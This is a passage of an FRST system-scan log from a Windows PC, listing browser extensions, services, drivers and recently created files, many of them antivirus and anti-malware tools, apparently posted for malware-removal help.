Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-06-12]CHR Extension: (Anti-Banner) - C:\Users\Matthew Daubenspeck\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjldcfjmnllhmgjclecdnfampinooman [2014-06-12]CHR HKLM-x32\...\Chrome\Extension: [blbkdnmdcafmfhinpmnlhhddbepgkeaa] - https://chrome.google.com/webstore/detail/blbkdnmdcafmfhinpmnlhhddbepgkeaa [] CHR HKLM-x32\...\Chrome\Extension: [dchlnpcodkpfdpacogkljefecpegganj] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\urladvisor.crx [2013-06-17]CHR HKLM-x32\...\Chrome\Extension: [pjldcfjmnllhmgjclecdnfampinooman] - C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\ChromeExt\ab.crx [2013-06-17] ==================== Services (Whitelisted) ================= (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) R2 !SASCORE; d:\Program Files\SUPERAntiSpyware\SASCORE64.EXE [172344 2014-07-22] (SUPERAntiSpyware.com)R2 AVP; C:\Program Files (x86)\Kaspersky Lab\Kaspersky Internet Security 14.0.0\avp.exe [214512 2014-06-12] (Kaspersky Lab ZAO)S3 Creative ALchemy AL6 Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\AL6Licensing.exe [79360 2014-06-12] (Creative Labs) [File not signed]S3 Creative Audio Engine Licensing Service; C:\Program Files (x86)\Common Files\Creative Labs Shared\Service\CTAELicensing.exe [79360 2014-06-12] (Creative Labs) [File not signed]R2 CTAudSvcService; C:\Program Files (x86)\Creative\Shared Files\CTAudSvc.exe [423424 2012-10-08] (Creative Technology Ltd) [File not signed]R2 CtHdaSvc; C:\Windows\sysWow64\CtHdaSvc.exe [112640 2013-07-03] (Creative Technology Ltd)R2 Intel® Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [747520 2013-08-27] (Intel® Corporation) [File not signed]S3 Intel® Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [828376 2013-08-27] (Intel® Corporation)R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [169432 2013-09-16] (Intel Corporation)R2 MbaeSvc; d:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae-svc.exe [360592 2014-06-04] (Malwarebytes Corporation)R2 MBAMScheduler; d:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe [1809720 2014-05-12] (Malwarebytes Corporation)R2 MBAMService; d:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe [860472 2014-05-12] (Malwarebytes Corporation)R2 SDScannerService; d:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe [1738168 2014-06-24] (Safer-Networking Ltd.)R2 SDUpdateService; d:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe [2088408 2014-06-27] (Safer-Networking Ltd.)R2 SDWSCService; d:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe [171928 2014-04-25] (Safer-Networking Ltd.) ==================== Drivers (Whitelisted) ==================== (If an entry is included in the fixlist, the service will be removed from the registry. The file will not be moved unless listed separately.) S3 AiChargerPlus; C:\Windows\SysWow64\drivers\AiChargerPlus.sys [14848 2013-01-28] (ASUSTek Computer Inc.)R1 AsIO; C:\Windows\SysWow64\drivers\AsIO.sys [15232 2014-07-13] ()S1 ASMTFilter; C:\Windows\System32\DRIVERS\asmtufdriver.sys [21400 2014-08-23] (http://www.asmedia.com.tw) [File not signed] S1 ASMTFilter; C:\Windows\SysWOW64\DRIVERS\asmtufdriver.sys [16640 2014-08-23] (http://www.asmedia.com.tw) [File not signed] R1 AsUpIO; C:\Windows\SysWow64\drivers\AsUpIO.sys [14464 2014-07-13] ()S3 ASUSFILTER; C:\Windows\SysWow64\drivers\ASUSFILTER.sys [46152 2011-09-19] (MCCI Corporation)S3 bcbtums; C:\Windows\System32\drivers\bcbtums.sys [170200 2013-03-27] (Broadcom Corporation.)R1 CLVirtualDrive; C:\Windows\System32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink)R3 cthda; C:\Windows\System32\drivers\cthda.sys [1060632 2013-07-03] (Creative Technology Ltd)R3 cthdb; C:\Windows\System32\DRIVERS\cthdb.sys [34072 2013-07-03] (Creative Technology Ltd)R3 e1dexpress; C:\Windows\System32\DRIVERS\e1d62x64.sys [496400 2013-02-26] (Intel Corporation)R1 ESProtectionDriver; d:\Program Files (x86)\Malwarebytes Anti-Exploit\mbae64.sys [62392 2014-06-04] ()R0 iaStorF; C:\Windows\System32\DRIVERS\iaStorF.sys [28008 2013-08-07] (Intel Corporation)R0 kl1; C:\Windows\System32\DRIVERS\kl1.sys [458336 2014-06-12] (Kaspersky Lab ZAO)S4 klflt; C:\Windows\System32\DRIVERS\klflt.sys [115296 2014-06-12] (Kaspersky Lab ZAO)R1 KLIF; C:\Windows\System32\DRIVERS\klif.sys [625248 2014-06-12] (Kaspersky Lab ZAO)R1 KLIM6; C:\Windows\System32\DRIVERS\klim6.sys [29792 2014-06-12] (Kaspersky Lab ZAO)R3 klkbdflt; C:\Windows\System32\DRIVERS\klkbdflt.sys [29280 2014-06-12] (Kaspersky Lab ZAO)R3 klmouflt; C:\Windows\System32\DRIVERS\klmouflt.sys [29280 2014-06-12] (Kaspersky Lab ZAO)R1 klpd; C:\Windows\System32\DRIVERS\klpd.sys [15456 2013-04-12] (Kaspersky Lab ZAO)R1 kltdi; C:\Windows\System32\DRIVERS\kltdi.sys [55904 2013-05-14] (Kaspersky Lab ZAO)R1 kneps; C:\Windows\System32\DRIVERS\kneps.sys [178272 2014-06-12] (Kaspersky Lab ZAO)R1 mbamchameleon; C:\Windows\system32\drivers\mbamchameleon.sys [91352 2014-05-12] (Malwarebytes Corporation)R3 MBAMProtector; C:\Windows\system32\drivers\mbam.sys [25816 2014-05-12] (Malwarebytes Corporation)R3 MBAMSwissArmy; C:\Windows\system32\drivers\MBAMSwissArmy.sys [122584 2014-09-04] (Malwarebytes Corporation)R3 MBAMWebAccessControl; C:\Windows\system32\drivers\mwac.sys [63704 2014-05-12] (Malwarebytes Corporation)R3 MEIx64; C:\Windows\System32\DRIVERS\TeeDriverx64.sys [99288 2013-09-16] (Intel Corporation)R1 SASDIFSV; d:\Program Files\SUPERAntiSpyware\SASDIFSV64.SYS [14928 2011-07-22] (SUPERAdBlocker.com and SUPERAntiSpyware.com)R1 SASKUTIL; d:\Program Files\SUPERAntiSpyware\SASKUTIL64.SYS [12368 2011-07-12] (SUPERAdBlocker.com and SUPERAntiSpyware.com)S3 Serial; C:\Windows\system32\drivers\serial.sys [94208 2009-07-13] (Brother Industries Ltd.)S3 BCM42RLY; system32\drivers\BCM42RLY.sys [X]S3 Cpusat64; \??\C:\Program Files (x86)\Intel Corporation\Power Thermal Utility for Haswell DT-AIO-UPServer-Workstation Processor Rev. 1.1\Cpusat64.sys [X]S3 cpuz137; \??\C:\Windows\TEMP\cpuz137\cpuz137_x64.sys [X]S3 GPUZ; \??\C:\Windows\TEMP\GPUZ.sys [X]S4 nvvad_WaveExtensible; system32\drivers\nvvad64v.sys [X]S3 VGPU; System32\drivers\rdvgkmd.sys [X] ==================== NetSvcs (Whitelisted) =================== (If an item is included in the fixlist, it will be removed from the registry. Any associated file could be listed separately to be moved.) ==================== One Month Created Files and Folders ======== (If an entry is included in the fixlist, the file\folder will be moved.) 2014-09-04 20:06 - 2014-09-04 20:06 - 00000000 ____D () C:\FRST2014-09-04 19:28 - 2014-09-04 19:28 - 00058832 _____ () C:\Users\Matthew Daubenspeck\AppData\Local\GDIPFONTCACHEV1.DAT2014-09-04 16:56 - 2014-09-04 19:52 - 00000224 _____ () C:\Windows\setupact.log2014-09-04 16:56 - 2014-09-04 16:56 - 00269128 _____ () C:\Windows\system32\FNTCACHE.DAT2014-09-04 16:56 - 2014-09-04 16:56 - 00000000 _____ () C:\Windows\setuperr.log2014-09-04 07:20 - 2014-09-04 07:20 - 00000643 _____ () C:\Users\Matthew Daubenspeck\Desktop\JRT.txt2014-09-04 07:02 - 2014-09-04 20:05 - 00067656 _____ () C:\Windows\WindowsUpdate.log2014-09-04 06:51 - 2014-09-04 07:01 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SUPERAntiSpyware2014-09-04 06:51 - 2014-09-04 06:51 - 00000862 _____ () C:\Users\Public\Desktop\SUPERAntiSpyware Professional.lnk2014-09-04 06:51 - 2014-09-04 06:51 - 00000538 _____ () C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 76f5f907-df54-4db7-8cca-e9da5ee3a2b2.job2014-09-04 06:51 - 2014-09-04 06:51 - 00000538 _____ () C:\Windows\Tasks\SUPERAntiSpyware Scheduled Task 138cf3f9-f67a-4f49-9f2a-da614f7f040b.job2014-09-04 06:51 - 2014-09-04 06:51 - 00000000 ____D () C:\Users\Matthew Daubenspeck\AppData\Roaming\SUPERAntiSpyware.com2014-09-04 06:51 - 2014-09-04 06:51 - 00000000 ____D () C:\ProgramData\SUPERAntiSpyware.com2014-09-04 06:18 - 2014-09-04 06:18 - 00001588 _____ () C:\Users\Matthew Daubenspeck\Desktop\firefox.exe - Shortcut.lnk2014-09-04 06:12 - 2014-09-04 06:12 - 00001058 _____ () C:\Users\Matthew Daubenspeck\Desktop\SUPERAntiSpyware.exe - Shortcut.lnk2014-09-04 01:24 - 2009-06-10 16:00 - 00000824 _____ () C:\Windows\system32\Drivers\etc\hosts.20140904-012447.backup2014-09-04 00:36 - 2014-09-04 00:36 - 00000000 ____D () C:\Program Files (x86)\Spybot - Search & Destroy 22014-09-04 00:31 - 2014-09-04 00:31 - 00001054 _____ () C:\Users\Public\Desktop\Spybot-S&D Start Center.lnk2014-09-04 00:31 - 2014-09-04 00:31 - 00001054 _____ () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot-S&D Start Center.lnk2014-09-04 00:31 - 2014-09-04 00:31 - 00000000 ____D () C:\Windows\System32\Tasks\Safer-Networking2014-09-04 00:31 - 2014-09-04 00:31 - 00000000 ____D () C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Spybot - Search & Destroy 22014-09-04 00:31 - 2013-09-20 10:49 - 00021040 _____ (Safer Networking Limited) C:\Windows\system32\sdnclean64.exe2014-09-03 21:57 - 2014-09-03 21:57 - 00000404 _____ () C:\Users\Matthew Daubenspeck\Documents\cc_20140903_215716.reg2014-09-03 21:48 - 2014-09-03 21:48 - 00001231 _____ () C:\Users\Matthew Daubenspeck\Desktop\HitmanPro_x64.exe - Shortcut.lnk2014-09-02 12:46 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDYAK.DLL2014-09-02 12:46 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDTAT.DLL2014-09-02 12:46 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU1.DLL2014-09-02 12:46 - 2014-07-08 21:03 - 00007168 _____ (Microsoft Corporation) C:\Windows\system32\KBDBASH.DLL2014-09-02 12:46 - 2014-07-08 21:03 - 00006656 _____ (Microsoft Corporation) C:\Windows\system32\KBDRU.DLL2014-09-02 12:46 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDYAK.DLL2014-09-02 12:46 - 2014-07-08 20:31 - 00007168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDTAT.DLL2014-09-02 12:46 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU1.DLL2014-09-02 12:46 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDRU.DLL2014-09-02 12:46 - 2014-07-08 20:31 - 00006656 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KBDBASH.DLL2014-09-02 12:46 - 2014-07-08 17:38 - 00419992 _____ () C:\Windows\system32\locale.nls2014-09-02 12:46 - 2014-07-08 17:30 - 00419992 _____ () C:\Windows\SysWOW64\locale.nls2014-08-30 02:33 - 2014-09-04 19:52 - 00000000 ____D () C:\ProgramData\NVIDIA2014-08-30 02:33 - 2014-07-02 15:48 - 00075040 _____ (Khronos Group) C:\Windows\system32\OpenCL.dll2014-08-30 02:33 - 2014-07-02 15:48 - 00061912 _____ (Khronos Group) C:\Windows\SysWOW64\OpenCL.dll2014-08-30 02:33 - 2014-07-02 13:55 - 06783776 _____ (NVIDIA Corporation) C:\Windows\system32\nvcpl.dll2014-08-30 02:33 - 2014-07-02 13:55 - 03522392 _____ (NVIDIA Corporation) C:\Windows\system32\nvsvc64.dll2014-08-30 02:33 - 2014-07-02 13:55 - 00935368 _____ (NVIDIA Corporation) C:\Windows\system32\nvvsvc.exe2014-08-30 02:33 - 2014-07-02 13:55 - 00386520 _____ (NVIDIA Corporation) C:\Windows\system32\nvmctray.dll2014-08-30 02:33 - 2014-07-02 13:55 - 00062808 _____ (NVIDIA Corporation) C:\Windows\system32\nvshext.dll2014-08-30 02:33 - 2014-07-02 12:44 - 00609240 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvStreaming.exe2014-08-30 02:33 - 2014-07-02 05:14 - 03826628 _____ () C:\Windows\system32\nvcoproc.bin2014-08-30 02:32 - 2014-08-11 15:31 - 01515296 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdagenco6420103.dll2014-08-30 02:32 - 2014-08-11 15:31 - 00197408 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvhda64v.sys2014-08-30 02:32 - 2014-08-11 15:31 - 00031520 _____ (NVIDIA Corporation) C:\Windows\system32\nvhdap64.dll2014-08-30 02:32 - 2014-07-02 15:48 - 31512520 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglv64.dll2014-08-30 02:32 - 2014-07-02 15:48 - 24196896 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglv32.dll2014-08-30 02:32 - 2014-07-02 15:48 - 22994208 _____ (NVIDIA Corporation) C:\Windows\system32\nvcompiler.dll2014-08-30 02:32 - 2014-07-02 15:48 - 18626304 _____ (NVIDIA Corporation) C:\Windows\system32\nvwgf2umx.dll2014-08-30 02:32 - 2014-07-02 15:48 - 17555104 _____ (NVIDIA Corporation) C:\Windows\system32\nvd3dumx.dll2014-08-30 02:32 - 2014-07-02 15:48 - 16122344 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvwgf2um.dll2014-08-30 02:32 - 2014-07-02 15:48 - 15294296 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcompiler.dll2014-08-30 02:32 - 2014-07-02 15:48 - 14498552 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvd3dum.dll2014-08-30 02:32 - 2014-07-02 15:48 - 13922752 _____ (NVIDIA Corporation) C:\Windows\system32\nvopencl.dll2014-08-30 02:32 - 2014-07-02 15:48 - 13835208 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuda.dll2014-08-30 02:32 - 2014-07-02 15:48 - 12866008 _____ (NVIDIA Corporation) C:\Windows\system32\Drivers\nvlddmkm.sys2014-08-30 02:32 - 2014-07-02 15:48 - 11283344 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvopencl.dll2014-08-30 02:32 - 2014-07-02 15:48 - 11222048 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuda.dll2014-08-30 02:32 - 2014-07-02 15:48 - 04247000 _____ (NVIDIA Corporation) C:\Windows\system32\nvcuvid.dll2014-08-30 02:32 - 2014-07-02 15:48 - 03989960 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvcuvid.dll2014-08-30 02:32 - 2014-07-02 15:48 - 03196816 _____ (NVIDIA Corporation) C:\Windows\system32\nvapi64.dll2014-08-30 02:32 - 2014-07-02 15:48 - 02814656 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvapi.dll2014-08-30 02:32 - 2014-07-02 15:48 - 01890080 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispco6434052.dll2014-08-30 02:32 - 2014-07-02 15:48 - 01539928 _____ (NVIDIA Corporation) C:\Windows\system32\nvdispgenco6434052.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00965312 _____ (NVIDIA Corporation) C:\Windows\system32\nvumdshimx.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00944928 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFR64.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00907096 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFR.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00903624 _____ (NVIDIA Corporation) C:\Windows\system32\NvFBC64.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00869152 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvFBC.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00846832 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvumdshim.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00502232 _____ (NVIDIA Corporation) C:\Windows\system32\nvEncodeAPI64.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00418760 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvEncodeAPI.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00391640 _____ (NVIDIA Corporation) C:\Windows\system32\NvIFROpenGL.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00354016 _____ (NVIDIA Corporation) C:\Windows\system32\nvoglshim64.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00348120 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\NvIFROpenGL.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00305600 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvoglshim32.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00166568 _____ (NVIDIA Corporation) C:\Windows\system32\nvinitx.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00146480 _____ (NVIDIA Corporation) C:\Windows\SysWOW64\nvinit.dll2014-08-30 02:32 - 2014-07-02 15:48 - 00026353 _____ () C:\Windows\system32\nvinfo.pb2014-08-29 22:31 - 2010-08-30 08:34 - 00536576 _____ (SQLite Development Team) C:\Windows\SysWOW64\sqlite3.dll2014-08-29 22:17 - 2014-09-04 01:24 - 00000000 ____D () C:\ProgramData\Spybot - Search & Destroy2014-08-28 06:03 - 2014-08-28 06:03 - 00000000 ____D () C:\Program Files\HitmanPro2014-08-28 06:02 - 2014-09-03 21:54 - 00000000 ____D () C:\ProgramData\HitmanPro2014-08-28 03:44 - 2014-08-28 03:44 - 00001070 _____ () C:\Users\Matthew Daubenspeck\Documents\byteTHIS.txt2014-08-28 03:29 - 2014-08-28 03:29 - 00000000 ____D () C:\Windows\ERUNT2014-08-28 03:18 - 2014-09-04 07:14 - 00000000 ____D () C:\AdwCleaner2014-08-27 21:53 - 2014-08-22 21:07 - 00404480 _____ (Microsoft Corporation) C:\Windows\system32\gdi32.dll2014-08-27 21:53 - 2014-08-22 20:45 - 00311808 _____ (Microsoft Corporation) C:\Windows\SysWOW64\gdi32.dll2014-08-27 21:53 - 2014-08-22 19:59 - 03163648 _____ (Microsoft Corporation) C:\Windows\system32\win32k.sys2014-08-25 01:39 - 2014-08-25 09:01 - 02621440 _____ () C:\Windows\SysWOW64\㩣灜潲牧浡慤慴歜獡数獲祫氠扡慜灶㐱〮〮摜瑡屡潭畤敬彳湩敶瑮牯⹹慤2014-08-25 01:34 - 2014-08-25 01:34 - 00014220 _____ () C:\Users\Matthew Daubenspeck\Desktop\mrt.exe - Shortcut.lnk2014-08-23 05:02 - 2014-08-23 05:01 - 00041984 _____ (Intel Corporation) C:\Windows\system32\Drivers\USB3Ver.dll2014-08-23 05:00 - 2014-08-23 05:00 - 00016640 _____ (http://www.asmedia.com.tw) C:\Windows\SysWOW64\Drivers\asmtufdriver.sys 2014-08-19 22:08 - 2014-07-31 18:41 - 00348856 _____ (Microsoft Corporation) C:\Windows\system32\iedkcs32.dll2014-08-19 22:08 - 2014-07-31 18:16 - 00307384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iedkcs32.dll2014-08-19 22:08 - 2014-07-25 09:52 - 23645696 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.dll2014-08-19 22:08 - 2014-07-25 09:02 - 02724864 _____ (Microsoft Corporation) C:\Windows\system32\mshtml.tlb2014-08-19 22:08 - 2014-07-25 09:01 - 00004096 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollectorres.dll2014-08-19 22:08 - 2014-07-25 08:51 - 17524224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.dll2014-08-19 22:08 - 2014-07-25 08:30 - 00066048 _____ (Microsoft Corporation) C:\Windows\system32\iesetup.dll2014-08-19 22:08 - 2014-07-25 08:28 - 00548352 _____ (Microsoft Corporation) C:\Windows\system32\vbscript.dll2014-08-19 22:08 - 2014-07-25 08:28 - 00048640 _____ (Microsoft Corporation) C:\Windows\system32\ieetwproxystub.dll2014-08-19 22:08 - 2014-07-25 08:25 - 02774528 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll2014-08-19 22:08 - 2014-07-25 08:25 - 00083968 _____ (Microsoft Corporation) C:\Windows\system32\MshtmlDac.dll2014-08-19 22:08 - 2014-07-25 08:11 - 00051200 _____ (Microsoft Corporation) C:\Windows\system32\jsproxy.dll2014-08-19 22:08 - 2014-07-25 08:10 - 00033792 _____ (Microsoft Corporation) C:\Windows\system32\iernonce.dll2014-08-19 22:08 - 2014-07-25 08:04 - 02724864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtml.tlb2014-08-19 22:08 - 2014-07-25 08:03 - 00598016 _____ (Microsoft Corporation) C:\Windows\system32\ieui.dll2014-08-19 22:08 - 2014-07-25 08:00 - 00139264 _____ (Microsoft Corporation) C:\Windows\system32\ieUnatt.exe2014-08-19 22:08 - 2014-07-25 08:00 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\ieetwcollector.exe2014-08-19 22:08 - 2014-07-25 07:59 - 00758272 _____ (Microsoft Corporation) C:\Windows\system32\jscript9diag.dll2014-08-19 22:08 - 2014-07-25 07:47 - 00940032 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.exe2014-08-19 22:08 - 2014-07-25 07:40 - 00452096 _____ (Microsoft Corporation) C:\Windows\system32\dxtmsft.dll2014-08-19 22:08 - 2014-07-25 07:34 - 00455168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vbscript.dll2014-08-19 22:08 - 2014-07-25 07:34 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iesetup.dll2014-08-19 22:08 - 2014-07-25 07:33 - 00051200 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieetwproxystub.dll2014-08-19 22:08 - 2014-07-25 07:30 - 00061952 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MshtmlDac.dll2014-08-19 22:08 - 2014-07-25 07:28 - 05824512 _____ (Microsoft Corporation) C:\Windows\system32\jscript9.dll2014-08-19 22:08 - 2014-07-25 07:28 - 00072704 _____ (Microsoft Corporation) C:\Windows\system32\JavaScriptCollectionAgent.dll2014-08-19 22:08 - 2014-07-25 07:21 - 02184704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iertutil.dll2014-08-19 22:08 - 2014-07-25 07:19 - 00195584 _____ (Microsoft Corporation) C:\Windows\system32\msrating.dll2014-08-19 22:08 - 2014-07-25 07:18 - 00043008 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jsproxy.dll2014-08-19 22:08 - 2014-07-25 07:17 - 00085504 _____ (Microsoft Corporation) C:\Windows\system32\mshtmled.dll2014-08-19 22:08 - 2014-07-25 07:17 - 00032768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\iernonce.dll2014-08-19 22:08 - 2014-07-25 07:12 - 00438784 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieui.dll2014-08-19 22:08 - 2014-07-25 07:10 - 00292864 _____ (Microsoft Corporation) C:\Windows\system32\dxtrans.dll2014-08-19 22:08 - 2014-07-25 07:10 - 00112128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieUnatt.exe2014-08-19 22:08 - 2014-07-25 07:08 - 00597504 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9diag.dll2014-08-19 22:08 - 2014-07-25 07:06 - 04204032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\jscript9.dll2014-08-19 22:08 - 2014-07-25 06:52 - 00367104 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtmsft.dll2014-08-19 22:08 - 2014-07-25 06:47 - 00631808 _____ (Microsoft Corporation) C:\Windows\system32\msfeeds.dll2014-08-19 22:08 - 2014-07-25 06:43 - 00060416 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JavaScriptCollectionAgent.dll2014-08-19 22:08 - 2014-07-25 06:42 - 00692736 _____ (Microsoft Corporation) C:\Windows\system32\ie4uinit.exe2014-08-19 22:08 - 2014-07-25 06:39 - 02087936 _____ (Microsoft Corporation) C:\Windows\system32\inetcpl.cpl2014-08-19 22:08 - 2014-07-25 06:39 - 01249280 _____ (Microsoft Corporation) C:\Windows\system32\mshtmlmedia.dll2014-08-19 22:08 - 2014-07-25 06:36 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msrating.dll2014-08-19 22:08 - 2014-07-25 06:34 - 00069632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmled.dll2014-08-19 22:08 - 2014-07-25 06:29 - 00239616 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxtrans.dll2014-08-19 22:08 - 2014-07-25 06:23 - 13547008 _____ (Microsoft Corporation) C:\Windows\system32\ieframe.dll2014-08-19 22:08 - 2014-07-25 06:13 - 00526336 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msfeeds.dll2014-08-19 22:08 - 2014-07-25 06:07 - 02001920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\inetcpl.cpl2014-08-19 22:08 - 2014-07-25 06:07 - 01068032 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mshtmlmedia.dll2014-08-19 22:08 - 2014-07-25 06:03 - 11772928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieframe.dll2014-08-19 22:08 - 2014-07-25 05:52 - 02266624 _____ (Microsoft Corporation) C:\Windows\system32\wininet.dll2014-08-19 22:08 - 2014-07-25 05:26 - 01431040 _____ (Microsoft Corporation) C:\Windows\system32\urlmon.dll2014-08-19 22:08 - 2014-07-25 05:17 - 00846336 _____ (Microsoft Corporation) C:\Windows\system32\ieapfltr.dll2014-08-19 22:08 - 2014-07-25 05:09 - 00704512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieapfltr.dll2014-08-19 22:08 - 2014-07-25 05:05 - 01792512 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wininet.dll2014-08-19 22:08 - 2014-07-25 05:00 - 01169920 _____ (Microsoft Corporation) C:\Windows\SysWOW64\urlmon.dll2014-08-19 22:08 - 2014-07-15 22:23 - 00002048 _____ (Microsoft Corporation) C:\Windows\system32\tzres.dll2014-08-19 22:08 - 2014-07-15 21:46 - 00002048 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tzres.dll2014-08-19 22:08 - 2014-06-30 17:24 - 00008856 _____ (Microsoft Corporation) C:\Windows\system32\icardres.dll2014-08-19 22:08 - 2014-06-30 17:14 - 00008856 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardres.dll2014-08-19 22:08 - 2014-06-24 21:05 - 14175744 _____ (Microsoft Corporation) C:\Windows\system32\shell32.dll2014-08-19 22:08 - 2014-06-24 20:41 - 12874240 _____ (Microsoft Corporation) C:\Windows\SysWOW64\shell32.dll2014-08-19 22:08 - 2014-06-15 21:10 - 00985536 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgkrnl.sys2014-08-19 22:08 - 2014-06-06 01:16 - 00035480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TsWpfWrp.exe2014-08-19 22:08 - 2014-06-06 01:12 - 00035480 _____ (Microsoft Corporation) C:\Windows\system32\TsWpfWrp.exe2014-08-19 22:08 - 2014-06-03 05:02 - 03241984 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll2014-08-19 22:08 - 2014-06-03 05:02 - 01941504 _____ (Microsoft Corporation) C:\Windows\system32\authui.dll2014-08-19 22:08 - 2014-06-03 05:02 - 00504320 _____ (Microsoft Corporation) C:\Windows\system32\msihnd.dll2014-08-19 22:08 - 2014-06-03 05:02 - 00112064 _____ (Microsoft Corporation) C:\Windows\system32\consent.exe2014-08-19 22:08 - 2014-06-03 04:29 - 02363392 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll2014-08-19 22:08 - 2014-06-03 04:29 - 01805824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\authui.dll2014-08-19 22:08 - 2014-06-03 04:29 - 00337408 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msihnd.dll2014-08-19 22:08 - 2014-03-09 16:48 - 01389208 _____ (Microsoft Corporation) C:\Windows\system32\icardagt.exe2014-08-19 22:08 - 2014-03-09 16:48 - 00171160 _____ (Microsoft Corporation) C:\Windows\system32\infocardapi.dll2014-08-19 22:08 - 2014-03-09 16:47 - 00619672 _____ (Microsoft Corporation) C:\Windows\SysWOW64\icardagt.exe2014-08-19 22:08 - 2014-03-09 16:47 - 00099480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\infocardapi.dll2014-08-19 22:07 - 